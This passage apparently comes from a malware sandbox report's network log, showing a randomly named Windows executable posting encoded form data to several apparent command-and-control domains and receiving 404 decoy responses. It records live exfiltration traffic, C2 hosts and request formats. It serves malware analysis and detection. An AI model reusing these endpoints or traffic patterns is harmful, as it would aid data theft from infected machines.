                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  42 | 192.168.2.4 | 49779 | 85.13.151.9 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:28.987690926 CEST | 789 | OUT | POST /gs9g/ HTTP/1.1
                  Host: www.datensicherung.email
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.datensicherung.email
                  Referer: http://www.datensicherung.email/gs9g/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=4v8DtKRH15LABPWxSWMxFOFcdBPp3zvF2hasVEl47koFmiMpKD62NNqJ1g4+e2ZU2h1OTO5tn1lBOOF8aVpO8+2BNqWU7EamOD7vPwycK3uTAhI4l6QnYs3ZhFFuF6KKqjQFWUwyDqvCLhodoQLQMio6Pd/JSM1fgmRAE78P3fO5qxuJyB51k05YAw7e8scdrqe5LUbppcnY11S1kzkaSHk=
                  Sep 4, 2024 09:38:29.599603891 CEST | 360 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:29 GMT
                  Server: Apache
                  Content-Length: 196
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  43 | 192.168.2.4 | 49780 | 85.13.151.9 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:31.533190012 CEST | 10871 | OUT | POST /gs9g/ HTTP/1.1
                  Host: www.datensicherung.email
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.datensicherung.email
                  Referer: http://www.datensicherung.email/gs9g/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=… [TRUNCATED]
                  Sep 4, 2024 09:38:32.156059980 CEST | 360 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:32 GMT
                  Server: Apache
                  Content-Length: 196
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  44 | 192.168.2.4 | 49781 | 85.13.151.9 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:34.321432114 CEST | 489 | OUT | GET /gs9g/?gTSpc=Khb8pT&56gD=1tUju/dHge3HLZSeaGkKb9xpXzDM3iDxyQikSChTyVI6tApcYR3Jee2z9yFvFCdZtAxjWN4NnVxgCMN8Nn90/pKfV4KQ80W7DCKACFqXJiPyHwctgLFsPv8= HTTP/1.1
                  Host: www.datensicherung.email
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:38:34.942066908 CEST | 360 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:34 GMT
                  Server: Apache
                  Content-Length: 196
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  45 | 192.168.2.4 | 49782 | 104.21.35.73 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:40.757430077 CEST | 739 | OUT | POST /uhl0/ HTTP/1.1
                  Host: www.jiyitf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.jiyitf.top
                  Referer: http://www.jiyitf.top/uhl0/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=qeu/xX/6/sVZ1D8OSLnh4NgxmkrD+lf2F0ShA+57hJ3zkIJm0NkDiu6DBUuFHwbVGj1ZUicxVfVu94eHHYfO2NLn03cDc73JM8HAGpaWZv/INA20XUhrcFvU3WbTJ8lhGv9t23MDGQu1ZmlVti/7CXg6qyYsu46ARW67OJ3qH6NBqe8K4tG77fULteMZoII1Lw==
                  Sep 4, 2024 09:38:42.235805988 CEST | 770 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:42 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3QrZZmLd3CxMzuhOdmEFVo%2F124P9tHUZ80XAD6guzufB%2BONFGryXrEFtlSU9H0wEOj68pt4VuwrXS2AwU89AGSBWjYM2O7blQDbooMnwCBmO8NPetPQI%2FyUHQM3mMI6Kvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8bdc5246ffbd7cb1-EWR
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  46 | 192.168.2.4 | 49783 | 104.21.35.73 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:43.293009043 CEST | 759 | OUT | POST /uhl0/ HTTP/1.1
                  Host: www.jiyitf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.jiyitf.top
                  Referer: http://www.jiyitf.top/uhl0/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=qeu/xX/6/sVZ0iMOB8Th5tg2pErD3FfqF0OhA7Zrh7jzlqRm1MkDhu6DUkuMEAbOGjxRUn8xVfRu95OHAr3BwdLl4XcFRb3JM8HAGpOwZrTINRG0W2ZsfFvV+2bTN8ltGv9P22hsGWi1ZktVswH4IXg8uyZsn7boXlDSA6PLJL93i4tQpcnspfw4wZFtlL18Q/1o9CW+VS8UXutQzyqfl+0=
                  Sep 4, 2024 09:38:44.783538103 CEST | 776 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:44 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BXOkGO188K0%2FdGhR72%2BE06zm0h4ugb%2FDxeDDFKOcLIQmJXLUPxjwAbNl%2FOZQV5q6paIr9ELY8Y5fIWDKrVq6%2BXXLwUESNUBbNpTqs2h8YQajLj8qG7TvPsBoY6nq3OcUZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8bdc525708be424c-EWR
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  47 | 192.168.2.4 | 49784 | 104.21.35.73 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:45.843075991 CEST | 10841 | OUT | POST /uhl0/ HTTP/1.1
                  Host: www.jiyitf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.jiyitf.top
                  Referer: http://www.jiyitf.top/uhl0/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 71 65 75 2f 78 58 2f 36 2f 73 56 5a 30 69 4d 4f 42 38 54 68 35 74 67 32 70 45 72 44 33 46 66 71 46 30 4f 68 41 37 5a 72 68 37 62 7a 6c 62 78 6d 31 76 63 44 67 75 36 44 56 6b 75 4a 45 41 62 44 47 6a 4a 64 55 6e 78 4b 56 63 35 75 37 72 57 48 46 61 33 42 2b 64 4c 6c 77 33 63 45 63 37 33 6d 4d 38 33 4d 47 70 65 77 5a 72 54 49 4e 54 65 30 52 6b 68 73 54 6c 76 55 33 57 61 63 4a 38 6c 4a 47 76 31 31 32 32 56 47 47 6d 43 31 58 6b 39 56 68 6c 72 34 41 58 67 2b 70 79 5a 43 6e 37 58 33 58 6c 66 34 41 37 37 74 4a 4c 4a 33 6e 70 59 31 32 75 57 32 77 4d 49 30 6e 2b 78 75 72 70 35 73 52 73 41 51 35 33 47 2b 4a 32 77 74 52 35 38 34 6c 33 71 73 30 4b 36 2f 31 50 43 6b 77 54 4a 48 79 48 45 2f 6d 62 44 47 43 32 52 5a 31 75 78 48 6d 50 70 69 2f 36 41 4a 62 6a 46 66 39 74 30 45 53 58 32 67 6d 74 6b 58 75 2f 2b 6f 69 38 47 51 72 6e 2b 39 64 2f 4b 46 78 4c 6e 71 6f 4c 66 55 6c 43 35 4a 66 67 61 78 56 39 35 42 4d 5a 44 54 51 46 62 70 36 66 2b 79 4b 6b 4a 4b 74 62 78 46 6f 50 46 67 79 5a 57 59 46 52 2b 32 36 [TRUNCATED]
                  Data Ascii: 56gD= [TRUNCATED]
                  Timestamp: Sep 4, 2024 09:38:47.341674089 CEST | Bytes transferred: 782 | Direction: IN
                  HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:47 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4jkYK070JsTo1ofk9%2BPbAilfG%2F4MbAiGjpG%2B0uCu7IfHNv2mwyh4NSEHAYN%2Bj%2FoItBtq801TM%2B0OaQDgzRpcOt%2BYzhBkI4anoH%2BjbMDLN3NDqIP1A62Ddxh5SNkKnK%2F30Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8bdc5266f8027cf3-EWR
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                  Session ID: 48 | Source IP: 192.168.2.4 | Source Port: 49785 | Destination IP: 104.21.35.73 | Destination Port: 80 | PID: 5440 | Process: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp: Sep 4, 2024 09:38:48.388432980 CEST | Bytes transferred: 479 | Direction: OUT
                  GET /uhl0/?56gD=ncGfyjKG78FJ3RoiM5vIj9c1hRDw+kHAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI8bXCzTYoePvJD/HBD8ObPaKNbBrKYFELLGg=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.jiyitf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Timestamp: Sep 4, 2024 09:38:49.896876097 CEST | Bytes transferred: 1130 | Direction: IN
                  HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:49 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Frgizj9WQtT5Pc2HYVb5PiOilrxpS5VhIzAndHwBKA7mMQLMcC%2B%2BKU%2BgxNHgaWwFbHSqiVPJiAq3WGhwXn1BPBEwVRXSLs1O3ywRAx%2FeVhZEP45pi2DFpFWiHXV5DNCPnw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8bdc5276fa564246-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                  Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0


                  Session ID: 49 | Source IP: 192.168.2.4 | Source Port: 49786 | Destination IP: 192.185.211.122 | Destination Port: 80 | PID: 5440 | Process: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp: Sep 4, 2024 09:38:54.983428001 CEST | Bytes transferred: 763 | Direction: OUT
                  POST /7o3y/ HTTP/1.1
                  Host: www.tadalaturbo.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.tadalaturbo.online
                  Referer: http://www.tadalaturbo.online/7o3y/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 36 36 7a 32 6a 6d 53 53 73 51 72 6f 2f 4c 4a 55 67 6d 59 55 65 35 45 67 4f 61 58 56 39 31 55 41 56 6d 56 38 72 34 6d 6a 31 30 6f 6c 57 73 70 4a 73 32 34 63 44 2f 36 77 6c 62 4d 4f 71 52 58 69 6a 37 52 59 6e 39 6c 74 64 4b 36 56 73 4c 58 55 68 72 6b 49 39 76 72 5a 65 74 65 41 37 53 32 44 68 4a 6b 4e 44 35 63 68 71 79 52 67 45 33 6a 5a 4b 53 77 68 73 62 44 53 6d 6a 41 53 64 46 72 41 6e 37 6a 79 39 76 70 42 50 47 4d 34 2f 30 64 63 4b 75 36 37 36 6d 36 46 57 32 45 75 4e 70 33 66 67 72 6a 71 56 30 55 59 32 39 5a 65 53 72 6c 6a 30 34 54 62 43 79 58 71 72 2b 63 43 66 35 70 42 44 41 3d 3d
                  Data Ascii: 56gD=66z2jmSSsQro/LJUgmYUe5EgOaXV91UAVmV8r4mj10olWspJs24cD/6wlbMOqRXij7RYn9ltdK6VsLXUhrkI9vrZeteA7S2DhJkND5chqyRgE3jZKSwhsbDSmjASdFrAn7jy9vpBPGM4/0dcKu676m6FW2EuNp3fgrjqV0UY29ZeSrlj04TbCyXqr+cCf5pBDA==
                  Timestamp: Sep 4, 2024 09:38:55.450000048 CEST | Bytes transferred: 1121 | Direction: IN
                  HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:55 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                  Accept-Ranges: bytes
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Content-Length: 836
                  Content-Type: text/html
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                  Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                  Session ID: 50 | Source IP: 192.168.2.4 | Source Port: 49787 | Destination IP: 192.185.211.122 | Destination Port: 80 | PID: 5440 | Process: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp: Sep 4, 2024 09:38:57.555475950 CEST | Bytes transferred: 783 | Direction: OUT
                  POST /7o3y/ HTTP/1.1
                  Host: www.tadalaturbo.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.tadalaturbo.online
                  Referer: http://www.tadalaturbo.online/7o3y/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 36 36 7a 32 6a 6d 53 53 73 51 72 6f 74 61 5a 55 77 78 4d 55 63 5a 45 6a 41 36 58 56 6b 46 55 45 56 6d 52 38 72 37 72 6d 31 6d 38 6c 56 4a 4e 4a 69 58 34 63 45 2f 36 77 69 72 4d 50 6e 78 58 35 6a 37 63 6e 6e 35 74 74 64 4b 65 56 73 4a 66 55 30 4b 6b 4c 37 2f 72 62 55 39 65 65 34 69 32 44 68 4a 6b 4e 44 35 59 59 71 79 5a 67 45 6b 37 5a 4c 77 59 75 77 4c 44 52 68 6a 41 53 5a 46 72 45 6e 37 6a 55 39 71 77 4a 50 46 6b 34 2f 31 74 63 4e 2f 36 34 76 32 36 50 61 6d 46 45 42 70 54 54 75 65 53 6d 65 79 51 4c 2f 75 42 48 58 74 30 35 6c 4a 79 4d 51 79 7a 5a 32 35 56 32 53 36 55 49 59 46 79 44 59 4d 59 76 47 59 76 74 35 4c 77 2f 62 6b 2b 73 6d 46 34 3d
                  Data Ascii: 56gD=66z2jmSSsQrotaZUwxMUcZEjA6XVkFUEVmR8r7rm1m8lVJNJiX4cE/6wirMPnxX5j7cnn5ttdKeVsJfU0KkL7/rbU9ee4i2DhJkND5YYqyZgEk7ZLwYuwLDRhjASZFrEn7jU9qwJPFk4/1tcN/64v26PamFEBpTTueSmeyQL/uBHXt05lJyMQyzZ25V2S6UIYFyDYMYvGYvt5Lw/bk+smF4=
                  Timestamp: Sep 4, 2024 09:38:58.058960915 CEST | Bytes transferred: 1121 | Direction: IN
                  HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:57 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                  Accept-Ranges: bytes
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Content-Length: 836
                  Content-Type: text/html
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                  Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                  Session ID: 51 | Source IP: 192.168.2.4 | Source Port: 49788 | Destination IP: 192.185.211.122 | Destination Port: 80 | PID: 5440 | Process: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp: Sep 4, 2024 09:39:00.160928011 CEST | Bytes transferred: 10865 | Direction: OUT
                  POST /7o3y/ HTTP/1.1
                  Host: www.tadalaturbo.online
